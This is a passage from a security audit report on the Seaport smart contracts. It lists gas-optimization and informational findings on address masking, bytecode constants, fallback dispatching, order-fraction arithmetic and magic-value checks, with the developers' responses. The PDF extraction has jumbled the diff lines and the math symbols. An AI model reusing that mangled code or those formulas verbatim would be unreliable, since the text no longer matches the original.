ConsiderationDecoder.sol#L185-L188, ConsiderationDecoder.sol#L416 Description: In cases where an empty data needs to be allocated, one can use the zero slot. This can also be used as initial values for offer and consideration in abi_decode_generateOrder_returndata. Recommendation: For getEmptyBytesOrArray, the following can be made: function getEmptyBytesOrArray() internal pure returns (MemoryPointer mPtr) { - - + mPtr = malloc(32); mPtr.write(0); mPtr = MemoryPointer.wrap(0x60) In case of abi_decode_generateOrder_returndata, if the order is invalid, the function returns a memory pointer pointing to the slot 0x0 for the variables offer and consideration. The memory region [0, 32) is explicitly zeroed to cover this case. Instead of that, offer and consideration can be initialized to 0x60. Seaport: Acknowledged. Spearbit: Acknowledged. 37 +5.3.14 Some address fields are masked even though the ConsiderationDecoder wanted to skip this mask- ing Severity: Gas Optimization Context: • ZoneInteraction.sol#L10 • ZoneInteraction.sol#L61 • OrderValidator.sol#L598 • BasicOrderFulfiller.sol#L269 • BasicOrderFulfiller.sol#L196-L197 • BasicOrderFulfiller.sol#L207 • BasicOrderFulfiller.sol#L222-L223 • BasicOrderFulfiller.sol#L233-L234 • BasicOrderFulfiller.sol#L244 • BasicOrderFulfiller.sol#L246 • BasicOrderFulfiller.sol#L257 • BasicOrderFulfiller.sol#L259 • BasicOrderFulfiller.sol#L269 • OrderCombiner.sol#L562-L563 • OrderCombiner.sol#L591-L592 • OrderCombiner.sol#L458-L459 • OrderFulfiller.sol#L126-L127 • Executor.sol#L65 • Executor.sol#L74 • Executor.sol#L76 • Executor.sol#L84 • Executor.sol#L86 • Executor.sol#L95 • Executor.sol#L97 • Executor.sol#L60 - cleaned 3 times in the same spot • FulfillmentApplier.sol#L133 • OrderFulfiller.sol#L242 • OrderValidator.sol#L186 • OrderValidator.sol#L367 • ZoneInteraction.sol#L61 • ZoneInteraction.sol#L68 • Consideration.sol#L610 • GettersAndDerivers.sol#L323 • BasicOrderFulfiller.sol#L902 38 • Consideration.sol#L576 • FulfillmentApplier.sol#L177 • OrderValidator.sol#L634 Subset of find contracts/lib/ -type f -exec grep -nH --color -E ,! "\.(offerer|zone|token|recipient|considerationToken|offerToken)" {} \; Description: When a field of address type from a struct in memory is used, the compiler masks (also: 2, 3) it. struct A { address addr; } A memory a; // P is either a statement or a function call // when compiled --> and(mload(a_addr_pos), 0xffffffffffffffffffffffffffffffffffffffff) P(a.addr); Also the compiler is making use of function cleanup_address(value) -> cleaned { cleaned := and(value, 0xffffffffffffffffffffffffffffffffffffffff) } function abi_encode_address(value, pos) { mstore(pos, and(value, 0xffffffffffffffffffffffffffffffffffffffff)) } in a few places Recommendation: To prevent this masking (which is also what is intended by the ConsiderationDecoder for fields like zone, offerer, recipient, token ...), one should instead write statements in assembly and also when passing variables to functions, memory or calldata pointers should be used. Seaport: Acknowledged. Spearbit: Acknowledged. +5.3.15 div(x, (1< add(x, -4), used in dispatching to compare calldatasize with another value 8 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE0 // used for sub(x, ,! 0x20) -> add(x, -0x20) 6 PUSH32 0x4CE34AA200000000000000000000000000000000000000000000000000000000 // ,! Conduit_execute_signature 5 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF // used for sub(x, ,! 1) -> add(x, -1) 4 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00 // used to mask out ,! isValidated 4 PUSH32 0x4E487B7100000000000000000000000000000000000000000000000000000000 // ,! Panic_error_selector 3 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE4 // used for sub(x, ,! 0x3c - 0x20) -> add(x, -(0x3c - 0x20)), related to accumulator token offset 3 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC4 // related to ,! accumulator itemType offset 3 PUSH32 0x9D9AF8E38D66C62E2C12F0225249FD9D721C54B83F48D9352C97C6CACDCB6F31 // OrderFulfilled ,! topic0 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE1 // used for sub(x, ,! 0x1f) -> add(x, -0x1f) 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC0 // used for sub(x, ,! 0x40) -> add(x, -0x40) 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000FF // masks numerator ,! and isCancelled 2 PUSH32 0xFFFFFFFF00000000000000000000000000000000000000000000000000000000 // masks Conduit's ,! return data to compare with ConduitInterface.execute.selector 2 PUSH32 0x23B872DD00000000000000000000000000000000000000000000000000000000 // ,! ERC20_transferFrom_signature 2 PUSH32 0x1901000000000000000000000000000000000000000000000000000000000000 // EIP_712_PREFIX 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE // used for sub(x, ,! 2) -> add(x, -2) , when calculating receivedItemType 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBF // used for sub(x, ,! 0x41) -> add(x, -0x41), height := div(sub(fullLength, signatureLength), 0x20) 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBC // used for sub(x, ,! 0x44) -> add(x, -0x44), EIP1271_isValidSignature_selector_negativeOffset 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9D // used for sub(x, ,! 0x63) -> add(x, -0x63), sub(length, BulkOrderProof_minSize) 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEA1 // used for sub(x, 0x63) -> add(x, -0x63), calldata_array_index_access_struct_OrderComponents_calldata_dyn_calldata ,! 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000 // mask used to mask ,! out isCancelled and isValidated before canceling an order 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000 // used to only mask ,! the first 15 bytes (denominator) update_storage_value_offsett_uint120_to_t_uint120 1 PUSH32 0xF280791EFE782EDCF06CE15C8F4DFF17601DB3B88EB3805A0DB7D77FAF757F04 // ,! OrderValidated(orderHash, orderParameters) event topic0 1 PUSH32 0xF242432A00000000000000000000000000000000000000000000000000000000 // ,! ERC1155_safeTransferFrom_signature 1 PUSH32 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF // ,! EIP2098_allButHighestBitMask 1 PUSH32 0x721C20121297512B72821B97F5326877EA8ECF4BB9948FEA5BFCB6453074D37F // ,! CounterIncremented(uint256,address) event topic0 1 PUSH32 0x6BACC01DBE442496068F7D234EDD811F1A5F833243E0AEC824F86AB861F3C90D // ,! OrderCancelled(bytes32,address,address) event topic 0 1 PUSH32 0x1626BA7E00000000000000000000000000000000000000000000000000000000 // ,! EIP1271_isValidSignature_selector stat of push instructions excluding push2 213 PUSH1 0x0 41 212 PUSH1 0x20 194 PUSH1 0x40 111 PUSH1 0x1 88 PUSH1 0x60 78 PUSH1 0x4 77 PUSH1 0x80 69 PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF // when x.addr is passed to a function it ,! gets cleaned, one can avoid this cleaning procedure 58 PUSH1 0xA0 58 PUSH1 0x5 56 PUSH1 0x1C 43 PUSH1 0x24 38 PUSH1 0xC0 24 PUSH1 0x44 24 PUSH1 0x3 23 PUSH4 0xFFFFFFFF 23 PUSH1 0xE0 21 PUSH1 0x2 20 PUSH8 0xFFFFFFFFFFFFFFFF 17 PUSH32 0x0 17 PUSH1 0x64 16 PUSH15 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 15 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC 10 PUSH1 0xFF 10 PUSH1 0xA4 9 PUSH5 0x1FFFFFFFE0 9 PUSH1 0xC4 9 PUSH1 0x6 9 PUSH1 0x1F 8 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE0 8 PUSH1 0x84 8 PUSH1 0x10 6 PUSH32 0x4CE34AA200000000000000000000000000000000000000000000000000000000 6 PUSH1 0x88 5 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 4 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00 4 PUSH32 0x4E487B7100000000000000000000000000000000000000000000000000000000 4 PUSH1 0xE4 4 PUSH1 0x9 4 PUSH1 0x8 4 PUSH1 0x22 3 PUSH4 0xFB5014FC 3 PUSH4 0xF486BC87 3 PUSH4 0x5F15D672 3 PUSH4 0x1A783B8D 3 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE4 3 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC4 3 PUSH32 0x9D9AF8E38D66C62E2C12F0225249FD9D721C54B83F48D9352C97C6CACDCB6F31 3 PUSH1 0x41 3 PUSH1 0x11 2 PUSH4 0xD13D53D4 2 PUSH4 0x93979285 2 PUSH4 0x4E487B71 2 PUSH4 0x375C24C1 2 PUSH4 0x1A515574 2 PUSH4 0x17B1F942 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE1 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC0 2 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000FF 2 PUSH32 0xFFFFFFFF00000000000000000000000000000000000000000000000000000000 2 PUSH32 0x23B872DD00000000000000000000000000000000000000000000000000000000 2 PUSH32 0x1901000000000000000000000000000000000000000000000000000000000000 42 2 PUSH3 0xFFFFE0 2 PUSH21 0xFF0000000000000000000000000000000000000000 2 PUSH17 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000 2 PUSH1 0xB 2 PUSH1 0x7 2 PUSH1 0x55 2 PUSH1 0x45 2 PUSH1 0x42 2 PUSH1 0x3F 2 PUSH1 0x1D 1 PUSH8 0x7536561706F7274 1 PUSH5 0x736F6C6343 1 PUSH5 0x3FFFFFFFC0 1 PUSH5 0x101000000 1 PUSH4 0xFD9F1E10 1 PUSH4 0xFB0F3EE1 1 PUSH4 0xF4DD92CE 1 PUSH4 0xF47B7740 1 PUSH4 0xF07EC373 1 PUSH4 0xEE9E0E63 1 PUSH4 0xED98A574 1 PUSH4 0xE7ACAB24 1 PUSH4 0xD6929332 1 PUSH4 0xD5DA9A1B 1 PUSH4 0xC63CF089 1 PUSH4 0xBFB3F8CE 1 PUSH4 0xBCED929D 1 PUSH4 0xBA832FDD 1 PUSH4 0xB3A34C4C 1 PUSH4 0xA900866B 1 PUSH4 0xA8930E9A 1 PUSH4 0xA8174404 1 PUSH4 0xA61BE9F0 1 PUSH4 0xA5F54208 1 PUSH4 0xA11B63FF 1 PUSH4 0x9BDE339 1 PUSH4 0x98E9DB6E 1 PUSH4 0x98919765 1 PUSH4 0x98891923 1 PUSH4 0x94EB6AF6 1 PUSH4 0x91B3E514 1 PUSH4 0x8BAA579F 1 PUSH4 0x88147732 1 PUSH4 0x87201B41 1 PUSH4 0x815E1D64 1 PUSH4 0x80EC7374 1 PUSH4 0x7FDA7279 1 PUSH4 0x7FA8A987 1 PUSH4 0x79DF72BD 1 PUSH4 0x6FDDE03 1 PUSH4 0x6AB37CE7 1 PUSH4 0x69F95827 1 PUSH4 0x6088D7DE 1 PUSH4 0x5B34B966 1 PUSH4 0x5A052B32 1 PUSH4 0x55944A42 1 PUSH4 0x4F7FB80D 1 PUSH4 0x470C7C1D 1 PUSH4 0x466AA616 1 PUSH4 0x46423AA7 1 PUSH4 0x39F3E3FD 1 PUSH4 0x3312E32 43 1 PUSH4 0x21CCFEB7 1 PUSH4 0x1F003D0A 1 PUSH4 0x1CF99B26 1 PUSH4 0x133C37C6 1 PUSH4 0x12D3F5A3 1 PUSH4 0x10FDA3E1 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBF 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBC 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9D 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEA1 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000 1 PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000 1 PUSH32 0xF280791EFE782EDCF06CE15C8F4DFF17601DB3B88EB3805A0DB7D77FAF757F04 1 PUSH32 0xF242432A00000000000000000000000000000000000000000000000000000000 1 PUSH32 0x7FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 1 PUSH32 0x721C20121297512B72821B97F5326877EA8ECF4BB9948FEA5BFCB6453074D37F 1 PUSH32 0x6BACC01DBE442496068F7D234EDD811F1A5F833243E0AEC824F86AB861F3C90D 1 PUSH32 0x1626BA7E00000000000000000000000000000000000000000000000000000000 1 PUSH18 0x10000000000000000000000000000010001 1 PUSH17 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF 1 PUSH12 0xFFFFFFFFFFFFFFFFFFFFFFFF 1 PUSH1 0xE8 1 PUSH1 0xE3 1 PUSH1 0x63 1 PUSH1 0x47 1 PUSH1 0x32 1 PUSH1 0x23 1 PUSH1 0x21 1 PUSH1 0x1B 1 PUSH1 0x18 • PUSH32 0x0000000000000000000000000000000000000000000000000000000000000000 Not sure, why the compiler is including these long pushN 0s, they can be replaced to push1 0. Filed an issue for it here: Issue 13834 They might correspond to immutables that will be filled at a later stage (loadimmutable("dddd")). • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC This push32 is used by the compiler when dispatching to make sure the calldatasize is at least the minimum number required by the external endpoint. Refer to for optimization to use fallback to circumvent soliditys dispatcher mechanism. • PUSH32 0x4CE34AA200000000000000000000000000000000000000000000000000000000 This value is used for Conduit_execute_signature when populating a memory region to call a conduit: // Write ConduitInterface.execute.selector to memory. mstore(callDataOffset, Conduit_execute_signature) One can start the execute data at the same offset as the errors 0x1c so that this value is reduced to PUSH4 0x4CE34AA2. This might add 3 gas (due to calculating the offset) for some runtime routes which might not be ideal. • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF00000000000000000000000000000000FF • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF0000000000000000000000000000000000 These masks are used when storing orderStatus values, the following issue should solve using these masks 44 • The arithmetic in _validateOrderAndUpdateStatus can be simplified/optimized • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE0 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE4 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE1 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC0 • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFE • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBF • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFBC • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF9D • PUSH32 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEA1 These constants are used when the optimizer transforms sub(X, C) into add(X, -C) (here X is a variable and C is a constant). This Expression Simplifier optimization step does the transform so that the commutative operation add is used instead which allows one to move constants around and potentially combine them. When this optimization rule does not add any benefits and when C is a relatively small value, the transformation could grow the bytecode size. To prevent the optimizer steps to perform this transformation, one can use verbatim statements in YUL: /* let y := sub(x, 0xcc) * 60cc | push1 0xcc * 90 * 03 */ | swap1 | sub let y := verbatim_1i_1o(hex"60cc_90_03", x) Depending on how solc would juggle the stack around, the above suggestion might reduce the code size and might not change the runtime gas (one would need to run a gas diff). The above can be applied to for example when one does: height := div(sub(fullLength, signatureLength), 0x20) // or sub(length, BulkOrderProof_minSize) • PUSH20 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF See Some address fields are masked even though the ConsiderationDecoder wanted to skip this masking. Seaport: Acknowledged. Spearbit: Acknowledged. 45 +5.3.17 Use fallback() to circumvent Solidity's dispatcher mechanism Severity: Gas Optimization Context: • Consideration.sol#L39 Description: Among other things, the optimization steps are adding extra byte codes that are unnecessary for the dispatching mechanism. For example the Expression Simplifer is transforming the following calldata size comparisons: // slt(sub(calldatasize(), 4), X) push1 0x4 calldatasize sub slt into: // slt(add(calldatasize(), 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffc), X) push32 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffc calldatasize add slt And this happens for each exposed endpoint. This particular optimization rule is helpful if one could reorder and combine the constant value with another one ( A + (X (cid:0) B) ! (A (cid:0) B) + X , here A, B are constants and X is a variable ). But in this particular instance, the dispatcher does not perform better or worse in regards to the runtime code gas (it stays the same) but the optimization grows the bytecode size. • Note: The final bytecode depends on the options provided to solc. For the above finding, the default hardhat settings is used without the NO_SPECIALIZER flag. Recommendation: We can take advantage of the fallback() function to avoid the above scenarios. All ex- ternal functions would need to be removed and instead the dispatching would need to happens manually in the fallback() function. Seaport: Acknowledged. Spearbit: Acknowledged. +5.3.18 The arithmetic in _validateOrderAndUpdateStatus can be simplified/optimized Severity: Gas Optimization Context: • OrderValidator.sol#L107 • OrderValidator.sol#L192-L291 advancedOrder.denominator, Description: orderStatus.numerator and orderStatus.denominator contains multiple nested if/else blocks and for certain conditions/paths extra operations are performed. advancedOrder.numerator, arithmetic involving The variable description na advancedOrder.numerator 46 variable description da ns ds advancedOrder.denominator orderStatus.numerator orderStatus.denominator Depending on the case, the final outputs need to be: • Case 1. ds = 0 In this case na, da will be unmodified (besides the constraint checks) • Case 2. ds 6= 0, da = 1 In this case the remaining of the order will be filled and we would have (na, ns, da, ds) = (na, na, da, da) (na, ns, da, ds) = (ds (cid:0) ns, ds, ds, ds) Note that the invariant d (cid:21) n for new fractions and the combined ones is always guaranteed and so ds (cid:0) ns would not underflow. • Case 3. ds 6= 0, da 6= 1, da = ds Below (cid:15) = (na + ns > ds)(na + ns (cid:0) ds) is choosen so that order would not be overfilled. The parameters used in calculating (cid:15) are taken before they have been updated. • Case 4. ds 6= 0, da 6= 1, da 6= ds (na, ns, da, ds) = (na (cid:0) (cid:15), na + ns (cid:0) (cid:15), ds, ds) Below (cid:15) = (nads + nsda > dads)(nads + nsda (cid:0) dads) is choosen so that order would not be overfilled. And in case the new values go beyond 120 bits, G = gcd(nads (cid:0) (cid:15), nads + nsda (cid:0) (cid:15), dads), otherwise G will be 1. The parameters used in calculating (cid:15), G are taken before they have been updated. (na, ns, da, ds) = 1 G (nads (cid:0) (cid:15), nads + nsda (cid:0) (cid:15), dads, dads) If one of the updated values occupies more than 120 bits, the call will be reverted. Recommendation: It would be best to rewrite the logic for when fractions are combined for better readability and also in a more optimized way. Rough diff draft below. diff --git a/contracts/lib/ConsiderationConstants.sol b/contracts/lib/ConsiderationConstants.sol index 0879b60d..cde8b9d4 100644 --- a/contracts/lib/ConsiderationConstants.sol +++ b/contracts/lib/ConsiderationConstants.sol @@ -102,6 +102,10 @@ uint256 constant AdvancedOrder_denominator_offset = 0x40; uint256 constant AdvancedOrder_signature_offset = 0x60; uint256 constant AdvancedOrder_extraData_offset = 0x80; +uint256 constant OrderStatus_ValidatedAndNotCancelled = 1; +uint256 constant OrderStatus_filledNumerator_offset = 0x10; +uint256 constant OrderStatus_filledDenominator_offset = 0x88; + uint256 constant AlmostOneWord = 0x1f; 47 uint256 constant OneWord = 0x20; uint256 constant TwoWords = 0x40; diff --git a/contracts/lib/OrderValidator.sol b/contracts/lib/OrderValidator.sol index f57528b2..f6c373a5 100644 --- a/contracts/lib/OrderValidator.sol +++ b/contracts/lib/OrderValidator.sol @@ -100,9 +100,9 @@ contract OrderValidator is Executor, ZoneInteraction { order is invalid due to the time or status. * * * @return orderHash * @return newNumerator * @return numerator * * @return newDenominator A value indicating the total size of the order. * @return denominator A value indicating the total size of the order. */ The order hash. A value indicating the portion of the order that A value indicating the portion of the order that will be filled. - + - + function _validateOrderAndUpdateStatus( AdvancedOrder memory advancedOrder, @@ -111,8 +111,8 @@ contract OrderValidator is Executor, ZoneInteraction { internal returns ( bytes32 orderHash, uint256 newNumerator, uint256 newDenominator uint256 numerator, uint256 denominator - - + + ) { // Retrieve the parameters for the order. @@ -144,8 +144,18 @@ contract OrderValidator is Executor, ZoneInteraction { } - - + + + + + + + + + + + + // Read numerator and denominator from memory and place on the stack. uint256 numerator = uint256(advancedOrder.numerator); uint256 denominator = uint256(advancedOrder.denominator); // Overflowed values would be masked assembly { numerator := and( mload(add(advancedOrder, AdvancedOrder_numerator_offset)), MaxUint120 ) denominator := and( mload(add(advancedOrder, AdvancedOrder_denominator_offset)), MaxUint120 ) } // Ensure that the supplied numerator and denominator are valid. if (numerator > denominator || numerator == 0) { @@ -189,43 +199,85 @@ contract OrderValidator is Executor, ZoneInteraction { ); } - - - - - - - - // Read filled amount as numerator and denominator and put on the stack. uint256 filledNumerator = orderStatus.numerator; uint256 filledDenominator = orderStatus.denominator; // If order (orderStatus) currently has a non-zero denominator it is // partially filled. if (filledDenominator != 0) { // If denominator of 1 supplied, fill all remaining amount on order. 48 - - - - - - - - - - - - - - + + + + + + + + - - - - - - + + + + + - - - + + + + + + + + + + + + + + + + + + + + + + + if (denominator == 1) { // Scale numerator & denominator to match current denominator. numerator = filledDenominator; denominator = filledDenominator; } // Otherwise, if supplied denominator differs from current one... else if (filledDenominator != denominator) { // scale current numerator by the supplied denominator, then... filledNumerator *= denominator; // the supplied numerator & denominator by current denominator. numerator *= filledDenominator; denominator *= filledDenominator; } assembly { let orderStatusSlot := orderStatus.slot // Read filled amount as numerator and denominator and put on the stack. let filledNumerator := sload(orderStatusSlot) let filledDenominator := shr( OrderStatus_filledDenominator_offset, filledNumerator ) // Once adjusted, if current+supplied numerator exceeds denominator: if (filledNumerator + numerator > denominator) { // Skip underflow check: denominator >= orderStatus.numerator unchecked { // Reduce current numerator so it + supplied = denominator. numerator = denominator - filledNumerator; for {} 1 {} { if iszero(filledDenominator) { filledNumerator := numerator break } } // Increment the filled numerator by the new numerator. filledNumerator += numerator; // shift and mask to calculate the the current filled numerator filledNumerator := and( shr(OrderStatus_filledNumerator_offset, filledNumerator), MaxUint120 ) // If denominator of 1 supplied, fill all remaining amount on order. if eq(denominator, 1) { numerator := sub(filledDenominator, filledNumerator) denominator := filledDenominator filledNumerator := filledDenominator break } // If supplied denominator equals to the current one if eq(denominator, filledDenominator) { // Increment the filled numerator by the new numerator. filledNumerator := add(numerator, filledNumerator) // Once adjusted, if current+supplied numerator exceeds denominator: let _carry := mul( sub(filledNumerator, denominator), 49 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - - gt(filledNumerator, denominator) ) numerator := sub( numerator, _carry ) filledNumerator := sub( filledNumerator, _carry ) break } // Otherwise, if supplied denominator differs from current one... filledNumerator := mul(filledNumerator, denominator) numerator := mul(numerator, filledDenominator) denominator := mul(denominator, filledDenominator) // Increment the filled numerator by the new numerator. filledNumerator := add(numerator, filledNumerator) // Once adjusted, if current+supplied numerator exceeds denominator: let _carry := mul( sub(filledNumerator, denominator), gt(filledNumerator, denominator) ) numerator := sub( numerator, _carry ) filledNumerator := sub( filledNumerator, _carry ) // Use assembly to ensure fractional amounts are below max uint120. assembly { // Check filledNumerator and denominator for uint120 overflow. if or( gt(filledNumerator, MaxUint120), @@ -267,28 +319,25 @@ contract OrderValidator is Executor, ZoneInteraction { - + + + - - - - - - // Store the arithmetic (0x11) panic code. mstore(Panic_error_code_ptr, Panic_arithmetic) // revert(abi.encodeWithSignature("Panic(uint256)", 0x11)) revert(0x1c, Panic_error_length) revert(Error_selector_offset, Panic_error_length) } } break } // Skip overflow check: checked above unless numerator is reduced. unchecked { // Update order status and fill amount, packing struct values. orderStatus.isValidated = true; orderStatus.isCancelled = false; orderStatus.numerator = uint120(filledNumerator); 50 - - - + - - - - + ,! + + + + + + + + + - - - orderStatus.denominator = uint120(denominator); } } else { // Update order status and fill amount, packing struct values. orderStatus.isValidated = true; orderStatus.isCancelled = false; orderStatus.numerator = uint120(numerator); orderStatus.denominator = uint120(denominator); // [denominator: 15 bytes] [numerator: 15 bytes] [isCanecelled: 1 byte] [isValidated: 1 byte] sstore(orderStatusSlot, or( OrderStatus_ValidatedAndNotCancelled, or( shl(OrderStatus_filledNumerator_offset, filledNumerator), shl(OrderStatus_filledDenominator_offset, denominator) ) ) ) } // Return order hash, a modified numerator, and a modified denominator. return (orderHash, numerator, denominator); } /** Seaport: Fixed in PR 818. Spearbit: Verified. +5.3.19 Redundant use of OffsetOrLengthMask Severity: Gas Optimization Context: ConsiderationEncoder.sol#L59 Description: unchecked { size = ((src.readUint256() & OffsetOrLengthMask) + AlmostTwoWords) & OnlyFullWordMask; ... } The mask in ((src.readUint256() & OffsetOrLengthMask) is redundant, and the following expression will be equivalent: size = (src.readUint256() + AlmostTwoWords) & OnlyFullWordMask; Seaport: Fixed in PR 798. Spearbit: Verified. 51 5.4 Informational +5.4.1 Deviations between standard ABI routines and abi-lity Severity: Informational Context: • ConsiderationEncoder.sol • ConsiderationDecoder.sol Description: 1. readMaskedUint256: masks the higher order bits for calldata pointers. In high level solidity, this would revert. 2. readBool, etc: does not check for higher order bits, nor clean the value. In high-level solidity, this would revert. 3. readInt8, etc: similar to the readBool case. This is interesting because sometimes a signextend maybe needed, if the value is used with sdiv or smod. 4. abi_encode_bytes does not clean up data at the end of the last word. For example, consider a bytes memory of length 1. Then the routine copies 64 bytes of data. However, we can only guarantee the integrity of the first 32 + 8 = 40 bytes. 5. abi_decode_bytes has the same types of issues as abi_encode_bytes. 6. abi_decode_generateOrder_returndata expects stricter ABI encoding, i.e., the encoding cannot have any extra data. Seaport: Acknowledged. Spearbit: Acknowledged. +5.4.2 The magic return value checks can be made stricter Severity: Informational Context: ZoneInteraction.sol#L186 Description: The magic return value check for ZoneInteraction can be made stricter. 1. It does not check the lower 28 bytes of the return value. 2. It does not check if extcodesize() of the zone is non-zero. In particular, for the identity precompile, the magic check would pass. This is, however, a general issue with the pattern where magic values are the same as the function selector and not specific to the Zone. Recommendation: The following snippet would additionally check that the lower 28 bytes of returndata is also 0. This would also save some gas. // The data [4:32) is 0. let magic := mload(callData) // Uses a stricter ABI standard, the lower bits are also checked. magicMatch := eq(magic, mload(0)) If we want the magic return value check to fail for the identity precompile, then the call should be prefaced by an extcodesize() check. This would, however, increase the gas by 100. Seaport: It's probably a little safer to mask calldata and compare to an unshifted mload to also compare against the 28 lower bits being empty or unreturned. This was changed in PR 800 to let magic := and(mload(callData), 